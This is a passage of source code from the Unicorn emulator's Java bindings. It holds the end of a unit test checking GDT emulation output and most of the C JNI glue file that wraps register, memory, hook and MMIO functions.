assertEquals( "Demonstrate GDT usage\n" + "Executing at 0x1000000, ilen = 0x5\n" + "mem write at 0x120ffc, size = 4, value = 0x1234567\n" + "Executing at 0x1000005, ilen = 0x5\n" + "mem write at 0x120ff8, size = 4, value = 0x89abcdef\n" + "Executing at 0x100000a, ilen = 0xb\n" + "mem write at 0x7efdd000, size = 4, value = 0x1234567\n" + "Executing at 0x1000015, ilen = 0xb\n" + "mem write at 0x7efdd004, size = 4, value = 0x89abcdef\n" + "efcdab8967452301\n", outContent.toString()); } } unicorn-2.1.1/bindings/java/unicorn_Unicorn.c000066400000000000000000001377421467524106700212560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /** Note: JNI function signatures and names must be kept in sync with unicorn_Unicorn.h, which is in turn auto-generated by `javac -h`. */ #include #include "unicorn/platform.h" #include #include #include #include #include "unicorn_Unicorn.h" static JavaVM *cachedJVM; JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *jvm, void *reserved) { cachedJVM = jvm; return JNI_VERSION_1_6; } static void throwUnicornException(JNIEnv *env, uc_err err) { jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); const char *msg = uc_strerror(err); (*env)->ThrowNew(env, clazz, msg); } static void throwCustomUnicornException(JNIEnv *env, const char *msg) { jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); (*env)->ThrowNew(env, clazz, msg); } static void throwOutOfMemoryError(JNIEnv *env, char *message) { jclass clazz = (*env)->FindClass(env, "java/lang/OutOfMemoryError"); (*env)->ThrowNew(env, clazz, message); } static jobject makeX86_MMR(JNIEnv *env, const uc_x86_mmr *mmr) { if (mmr == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/X86_MMR"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "", "(JIIS)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jlong)mmr->base, (jint)mmr->limit, (jint)mmr->flags, (jshort)mmr->selector); } static jobject makeArm64_CP(JNIEnv *env, const uc_arm64_cp_reg *cp_reg) { if (cp_reg == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/Arm64_CP"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "", "(IIIIIJ)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jint)cp_reg->crn, (jint)cp_reg->crm, (jint)cp_reg->op0, (jint)cp_reg->op1, (jint)cp_reg->op2, (jlong)cp_reg->val); } static jobject makeTranslationBlock(JNIEnv *env, const uc_tb *tb) { if (tb == NULL) { return NULL; } static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/TranslationBlock"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "", "(JII)V"); if (!clazzInit) return NULL; } return (*env)->NewObject(env, clazz, clazzInit, (jlong)tb->pc, (jint)tb->icount, (jint)tb->size); } struct hook_wrapper { uc_hook uc_hh; jobject unicorn; jobject hook_obj; jmethodID hook_meth; jobject user_data; }; static bool hookErrorCheck(uc_engine *uc, JNIEnv *env) { /* If a hook throws an exception, we want to report it as soon as possible. Additionally, once an exception is set, calling further hooks is inadvisable. Therefore, try and stop the emulator as soon as an exception is detected. */ if ((*env)->ExceptionCheck(env)) { uc_emu_stop(uc); return true; } return false; } static const char *const sig_InterruptHook = "(Lunicorn/Unicorn;ILjava/lang/Object;)V"; static void cb_hookintr(uc_engine *uc, uint32_t intno, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)intno, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_InHook = "(Lunicorn/Unicorn;IILjava/lang/Object;)I"; static uint32_t cb_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)port, (jint)size, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (uint32_t)result; } static const char *const sig_OutHook = "(Lunicorn/Unicorn;IIILjava/lang/Object;)V"; static void cb_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)port, (jint)size, (jint)value, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_SyscallHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)V"; static void cb_insn_syscall(struct uc_struct *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_CpuidHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)I"; static int cb_insn_cpuid(struct uc_struct *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (int)result; } static const char *const sig_Arm64SysHook = "(Lunicorn/Unicorn;ILunicorn/Arm64_CP;Ljava/lang/Object;)I"; static uint32_t cb_insn_sys(uc_engine *uc, uc_arm64_reg reg, const uc_arm64_cp_reg *cp_reg, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jobject jcp_reg = makeArm64_CP(env, cp_reg); if (!jcp_reg) { hookErrorCheck(uc, env); return 0; } jint result = (*env)->CallIntMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)reg, jcp_reg, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (uint32_t)result; } static const char *const sig_CodeHook = "(Lunicorn/Unicorn;JILjava/lang/Object;)V"; static void cb_hookcode(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)address, (jint)size, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_EventMemHook = "(Lunicorn/Unicorn;IJIJLjava/lang/Object;)Z"; static bool cb_eventmem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jboolean result = (*env)->CallBooleanMethod( env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)type, (jlong)address, (jint)size, (jlong)value, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } return result != JNI_FALSE; } static const char *const sig_MemHook = "(Lunicorn/Unicorn;IJIJLjava/lang/Object;)V"; static void cb_hookmem(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jint)type, (jlong)address, (jint)size, (jlong)value, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_InvalidInstructionHook = "(Lunicorn/Unicorn;Ljava/lang/Object;)Z"; static bool cb_hookinsn_invalid(uc_engine *uc, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jboolean result = (*env)->CallBooleanMethod( env, hh->hook_obj, hh->hook_meth, hh->unicorn, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } return result != JNI_FALSE; } static const char *const sig_EdgeGeneratedHook = "(Lunicorn/Unicorn;Lunicorn/TranslationBlock;" "Lunicorn/TranslationBlock;Ljava/lang/Object;)V"; static void cb_edge_gen(uc_engine *uc, uc_tb *cur_tb, uc_tb *prev_tb, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jobject jcur_tb = makeTranslationBlock(env, cur_tb); if (!jcur_tb) { hookErrorCheck(uc, env); return; } jobject jprev_tb = makeTranslationBlock(env, prev_tb); if (!jprev_tb) { hookErrorCheck(uc, env); return; } (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, jcur_tb, jprev_tb, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_TcgOpcodeHook = "(Lunicorn/Unicorn;JJJILjava/lang/Object;)V"; static void cb_tcg_op_2(uc_engine *uc, uint64_t address, uint64_t arg1, uint64_t arg2, uint32_t size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)address, (jlong)arg1, (jlong)arg2, (jint)size, hh->user_data); hookErrorCheck(uc, env); } static const char *const sig_TlbFillHook = "(Lunicorn/Unicorn;JILjava/lang/Object;)J"; static bool cb_tlbevent(uc_engine *uc, uint64_t vaddr, uc_mem_type type, uc_tlb_entry *entry, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jlong result = (*env)->CallLongMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)vaddr, (jint)type, hh->user_data); if (hookErrorCheck(uc, env)) { return false; } if (result == -1L) { return false; } else { entry->paddr = result & ~UC_PROT_ALL; entry->perms = result & UC_PROT_ALL; return true; } } static const char *const sig_MmioReadHandler = "(Lunicorn/Unicorn;JILjava/lang/Object;)J"; static uint64_t cb_mmio_read(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; jlong result = (*env)->CallLongMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)offset, (jint)size, hh->user_data); if (hookErrorCheck(uc, env)) { return 0; } return (uint64_t)result; } static const char *const sig_MmioWriteHandler = "(Lunicorn/Unicorn;JIJLjava/lang/Object;)V"; static void cb_mmio_write(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { JNIEnv *env; (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); struct hook_wrapper *hh = user_data; (*env)->CallVoidMethod(env, hh->hook_obj, hh->hook_meth, hh->unicorn, (jlong)offset, (jint)size, (jlong)value, hh->user_data); hookErrorCheck(uc, env); } /* * Class: unicorn_Unicorn * Method: _open * Signature: (II)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1open(JNIEnv *env, jclass clazz, jint arch, jint mode) { uc_engine *eng = NULL; uc_err err = uc_open(arch, mode, &eng); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return (jlong)eng; } /* * Class: unicorn_Unicorn * Method: _close * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1close(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_close((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _emu_start * Signature: (JJJJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1emu_1start( JNIEnv *env, jclass clazz, jlong uc, jlong begin, jlong until, jlong timeout, jlong count) { uc_err err = uc_emu_start((uc_engine *)uc, begin, until, timeout, (size_t)count); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _emu_stop * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1emu_1stop(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_emu_stop((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } static uc_err generic_reg_read(jlong ptr, jint isContext, jint regid, void *result, size_t *size) { if (isContext) { return uc_context_reg_read2((uc_context *)ptr, regid, result, size); } else { return uc_reg_read2((uc_engine *)ptr, regid, result, size); } } static uc_err generic_reg_write(jlong ptr, jint isContext, jint regid, const void *value, size_t *size) { if (isContext) { return uc_context_reg_write2((uc_context *)ptr, regid, value, size); } else { return uc_reg_write2((uc_engine *)ptr, regid, value, size); } } /* * Class: unicorn_Unicorn * Method: _reg_read_long * Signature: (JII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1long( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid) { uint64_t result = 0; size_t size = 8; uc_err err = generic_reg_read(ptr, isContext, regid, &result, &size); /* TODO: If the host is big-endian and size < 8 after the read, the result must be transposed to the least-significant bytes. */ if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _reg_read_bytes * Signature: (JII[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1read_1bytes( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jbyteArray data) { jbyte *arr = (*env)->GetByteArrayElements(env, data, NULL); size_t size = (*env)->GetArrayLength(env, data); uc_err err = generic_reg_read(ptr, isContext, regid, arr, &size); (*env)->ReleaseByteArrayElements(env, data, arr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_write_long * Signature: (JIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1long(JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jlong value) { uint64_t cvalue = value; size_t size = 8; uc_err err = generic_reg_write(ptr, isContext, regid, &cvalue, &size); /* TODO: If the host is big-endian and size < 8 after the write, we need to redo the write with the pointer shifted appropriately */ if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_write_bytes * Signature: (JII[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1bytes( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jbyteArray data) { jbyte *arr = (*env)->GetByteArrayElements(env, data, NULL); size_t size = (*env)->GetArrayLength(env, data); uc_err err = generic_reg_write(ptr, isContext, regid, arr, &size); (*env)->ReleaseByteArrayElements(env, data, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_x86_mmr * Signature: (JII)Lunicorn/X86_MMR; */ JNIEXPORT jobject JNICALL Java_unicorn_Unicorn__1reg_1read_1x86_1mmr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid) { uc_x86_mmr reg = {0}; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, regid, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return makeX86_MMR(env, ®); } /* * Class: unicorn_Unicorn * Method: _reg_write_x86_mmr * Signature: (JIISJII)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1x86_1mmr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint regid, jshort selector, jlong base, jint limit, jint flags) { uc_x86_mmr reg = {0}; reg.selector = selector; reg.base = base; reg.limit = limit; reg.flags = flags; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, regid, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_x86_msr * Signature: (JII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1x86_1msr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint rid) { uc_x86_msr reg = {0}; reg.rid = rid; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_X86_REG_MSR, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.value; } /* * Class: unicorn_Unicorn * Method: _reg_write_x86_msr * Signature: (JIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1x86_1msr( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint rid, jlong value) { uc_x86_msr reg = {0}; reg.rid = rid; reg.value = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_X86_REG_MSR, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_arm_cp * Signature: (JIIIIIIII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1arm_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint cp, jint is64, jint sec, jint crn, jint crm, jint opc1, jint opc2) { uc_arm_cp_reg reg = {0}; reg.cp = cp; reg.is64 = is64; reg.sec = sec; reg.crn = crn; reg.crm = crm; reg.opc1 = opc1; reg.opc2 = opc2; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_ARM_REG_CP_REG, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.val; } /* * Class: unicorn_Unicorn * Method: _reg_write_arm_cp * Signature: (JIIIIIIIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1arm_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint cp, jint is64, jint sec, jint crn, jint crm, jint opc1, jint opc2, jlong value) { uc_arm_cp_reg reg = {0}; reg.cp = cp; reg.is64 = is64; reg.sec = sec; reg.crn = crn; reg.crm = crm; reg.opc1 = opc1; reg.opc2 = opc2; reg.val = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_ARM_REG_CP_REG, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _reg_read_arm64_cp * Signature: (JIIIIII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1reg_1read_1arm64_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint crn, jint crm, jint op0, jint op1, jint op2) { uc_arm64_cp_reg reg = {0}; reg.crn = crn; reg.crm = crm; reg.op0 = op0; reg.op1 = op1; reg.op2 = op2; size_t size = sizeof(reg); uc_err err = generic_reg_read(ptr, isContext, UC_ARM64_REG_CP_REG, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return reg.val; } /* * Class: unicorn_Unicorn * Method: _reg_write_arm64_cp * Signature: (JIIIIIIJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1reg_1write_1arm64_1cp( JNIEnv *env, jclass clazz, jlong ptr, jint isContext, jint crn, jint crm, jint op0, jint op1, jint op2, jlong value) { uc_arm64_cp_reg reg = {0}; reg.crn = crn; reg.crm = crm; reg.op0 = op0; reg.op1 = op1; reg.op2 = op2; reg.val = value; size_t size = sizeof(reg); uc_err err = generic_reg_write(ptr, isContext, UC_ARM64_REG_CP_REG, ®, &size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_read * Signature: (JJ[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1read(JNIEnv *env, jclass clazz, jlong uc, jlong address, jbyteArray dest) { jsize size = (*env)->GetArrayLength(env, dest); jbyte *arr = (*env)->GetByteArrayElements(env, dest, NULL); uc_err err = uc_mem_read((uc_engine *)uc, address, arr, size); (*env)->ReleaseByteArrayElements(env, dest, arr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_write * Signature: (JJ[B)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1write(JNIEnv *env, jclass clazz, jlong uc, jlong address, jbyteArray src) { jsize size = (*env)->GetArrayLength(env, src); jbyte *arr = (*env)->GetByteArrayElements(env, src, NULL); uc_err err = uc_mem_write((uc_engine *)uc, address, arr, size); (*env)->ReleaseByteArrayElements(env, src, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _version * Signature: ()I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1version(JNIEnv *env, jclass clazz) { return (jint)uc_version(NULL, NULL); } /* * Class: unicorn_Unicorn * Method: _arch_supported * Signature: (I)Z */ JNIEXPORT jboolean JNICALL Java_unicorn_Unicorn__1arch_1supported(JNIEnv *env, jclass clazz, jint arch) { return (jboolean)(uc_arch_supported((uc_arch)arch) != 0); } /* * Class: unicorn_Unicorn * Method: _query * Signature: (JI)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1query(JNIEnv *env, jclass clazz, jlong uc, jint type) { size_t result; uc_err err = uc_query((uc_engine *)uc, type, &result); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _errno * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1errno(JNIEnv *env, jclass clazz, jlong uc) { return uc_errno((uc_engine *)uc); } /* * Class: unicorn_Unicorn * Method: _strerror * Signature: (I)Ljava/lang/String; */ JNIEXPORT jstring JNICALL Java_unicorn_Unicorn__1strerror(JNIEnv *env, jclass clazz, jint code) { const char *err = uc_strerror((int)code); return (*env)->NewStringUTF(env, err); } static void deleteHookWrapper(JNIEnv *env, struct hook_wrapper *hh) { if (hh) { if (hh->unicorn) (*env)->DeleteGlobalRef(env, hh->unicorn); if (hh->hook_obj) (*env)->DeleteGlobalRef(env, hh->hook_obj); if (hh->user_data) (*env)->DeleteGlobalRef(env, hh->user_data); free(hh); } } static struct hook_wrapper *makeHookWrapper(JNIEnv *env, jobject self, jobject callback, jobject user_data, const char *hook_name, const char *hook_sig) { struct hook_wrapper *hh = calloc(1, sizeof(struct hook_wrapper)); if (!hh) { throwOutOfMemoryError(env, "Unable to allocate hook_wrapper"); return NULL; } hh->unicorn = (*env)->NewGlobalRef(env, self); if (!hh->unicorn) { deleteHookWrapper(env, hh); return NULL; } hh->hook_obj = (*env)->NewGlobalRef(env, callback); if (!hh->hook_obj) { deleteHookWrapper(env, hh); return NULL; } jclass clazz = (*env)->GetObjectClass(env, callback); if (!clazz) { deleteHookWrapper(env, hh); return NULL; } hh->hook_meth = (*env)->GetMethodID(env, clazz, hook_name, hook_sig); if (!hh->hook_meth) { deleteHookWrapper(env, hh); return NULL; } if (user_data) { hh->user_data = (*env)->NewGlobalRef(env, user_data); if (!hh->user_data) { deleteHookWrapper(env, hh); return NULL; } } return hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJ)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJ( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_INTR) { hook_sig = sig_InterruptHook; hook_callback = cb_hookintr; } else if (type == UC_HOOK_CODE || type == UC_HOOK_BLOCK) { hook_sig = sig_CodeHook; // also BlockHook hook_callback = cb_hookcode; } else if ((type & UC_HOOK_MEM_INVALID) && !(type & ~UC_HOOK_MEM_INVALID)) { hook_sig = sig_EventMemHook; hook_callback = cb_eventmem; } else if ((type & UC_HOOK_MEM_VALID) && !(type & ~UC_HOOK_MEM_VALID)) { hook_sig = sig_MemHook; hook_callback = cb_hookmem; } else if (type == UC_HOOK_INSN_INVALID) { hook_sig = sig_InvalidInstructionHook; hook_callback = cb_hookinsn_invalid; } else if (type == UC_HOOK_EDGE_GENERATED) { hook_sig = sig_EdgeGeneratedHook; hook_callback = cb_edge_gen; } else if (type == UC_HOOK_TLB_FILL) { hook_sig = sig_TlbFillHook; hook_callback = cb_tlbevent; } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJI)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJI( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end, jint arg) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_INSN) { switch (arg) { case UC_X86_INS_IN: hook_sig = sig_InHook; hook_callback = cb_insn_in; break; case UC_X86_INS_OUT: hook_sig = sig_OutHook; hook_callback = cb_insn_out; break; case UC_X86_INS_SYSCALL: case UC_X86_INS_SYSENTER: hook_sig = sig_SyscallHook; hook_callback = cb_insn_syscall; break; case UC_X86_INS_CPUID: hook_sig = sig_CpuidHook; hook_callback = cb_insn_cpuid; break; case UC_ARM64_INS_MRS: case UC_ARM64_INS_MSR: case UC_ARM64_INS_SYS: case UC_ARM64_INS_SYSL: hook_sig = sig_Arm64SysHook; hook_callback = cb_insn_sys; break; default: throwUnicornException(env, UC_ERR_INSN_INVALID); return 0; } } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end, arg); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_add * Signature: (JILunicorn/Hook;Ljava/lang/Object;JJII)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1hook_1add__JILunicorn_Hook_2Ljava_lang_Object_2JJII( JNIEnv *env, jobject self, jlong uc, jint type, jobject callback, jobject user_data, jlong begin, jlong end, jint arg1, jint arg2) { const char *hook_sig; void *hook_callback; if (type == UC_HOOK_TCG_OPCODE) { hook_sig = sig_TcgOpcodeHook; hook_callback = cb_tcg_op_2; } else { throwUnicornException(env, UC_ERR_HOOK); return 0; } struct hook_wrapper *hh = makeHookWrapper(env, self, callback, user_data, "hook", hook_sig); if (hh == NULL) { return 0; } uc_err err = uc_hook_add((uc_engine *)uc, &hh->uc_hh, type, hook_callback, hh, begin, end, arg1, arg2); if (err != UC_ERR_OK) { throwUnicornException(env, err); deleteHookWrapper(env, hh); return 0; } return (jlong)hh; } /* * Class: unicorn_Unicorn * Method: _hook_del * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1hook_1del(JNIEnv *env, jclass clazz, jlong uc, jlong hh) { struct hook_wrapper *h = (struct hook_wrapper *)hh; uc_hook_del((uc_engine *)uc, h->uc_hh); if (h->unicorn) { (*env)->DeleteGlobalRef(env, h->unicorn); h->unicorn = NULL; } if (h->hook_obj) { (*env)->DeleteGlobalRef(env, h->hook_obj); h->hook_obj = NULL; } if (h->user_data) { (*env)->DeleteGlobalRef(env, h->user_data); h->user_data = NULL; } } /* * Class: unicorn_Unicorn * Method: _hookwrapper_free * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1hookwrapper_1free(JNIEnv *env, jclass clazz, jlong hh) { deleteHookWrapper(env, (struct hook_wrapper *)hh); } /* * Class: unicorn_Unicorn * Method: _mmio_map * Signature: * (JJJLunicorn/MmioReadHandler;Ljava/lang/Object;Lunicorn/MmioWriteHandler;Ljava/lang/Object;)[J */ JNIEXPORT jlongArray JNICALL Java_unicorn_Unicorn__1mmio_1map( JNIEnv *env, jobject self, jlong uc, jlong address, jlong size, jobject read_cb, jobject user_data_read, jobject write_cb, jobject user_data_write) { struct hook_wrapper *hooks[2] = {0}; if (read_cb) { hooks[0] = makeHookWrapper(env, self, read_cb, user_data_read, "read", sig_MmioReadHandler); if (!hooks[0]) { goto fail; } } if (write_cb) { hooks[1] = makeHookWrapper(env, self, write_cb, user_data_write, "write", sig_MmioWriteHandler); if (!hooks[1]) { goto fail; } } jlong hooksLong[2]; size_t hooksCount = 0; if (hooks[0]) hooksLong[hooksCount++] = (jlong)hooks[0]; if (hooks[1]) 